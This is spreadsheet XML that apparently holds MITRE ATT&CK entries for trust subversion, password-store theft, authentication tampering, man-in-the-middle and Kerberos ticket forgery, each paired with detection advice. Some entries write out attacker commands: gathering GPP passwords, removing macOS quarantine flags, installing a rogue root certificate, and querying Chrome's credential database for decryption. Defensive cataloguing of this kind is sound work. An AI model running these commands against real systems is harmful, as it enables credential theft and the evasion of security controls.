These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) 
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. </t>
  </si>
  <si>
    <t xml:space="preserve">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
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>Application control,Anti-virus,Autoruns Analysis,Digital Certificate Validation,Process whitelisting,User Mode Signature Validation,Windows User Account Control</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)
In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) 
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Windows Registry,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. 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Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control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to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Hijacking](https://attack.mitre.org/techniques/T1038).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Application control,Autoruns Analysis,Digital Certificate Validation,User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital certificate logs</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: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 (Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: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 (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t>Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.
Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,File monitoring,Process monitoring,System calls</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>PowerShell logs,Process monitoring,File monitoring,System calls,API monitoring</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>An adversary may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etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way)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password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData ‎April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,API monitoring,Windows Registry,Process monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference. 
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows or pluggable authentication modules (PAM) on Unix-based systems, responsible for gathering, storing, and validating credentials. 
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. </t>
  </si>
  <si>
    <t>credential-access,defense-evasion</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,DLL monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as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made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Man-in-the-Middle</t>
  </si>
  <si>
    <t>File monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.</t>
  </si>
  <si>
    <t>credential-access,collection</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>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 (Citation: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NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Windows event logs,Authentication logs</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). 
Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
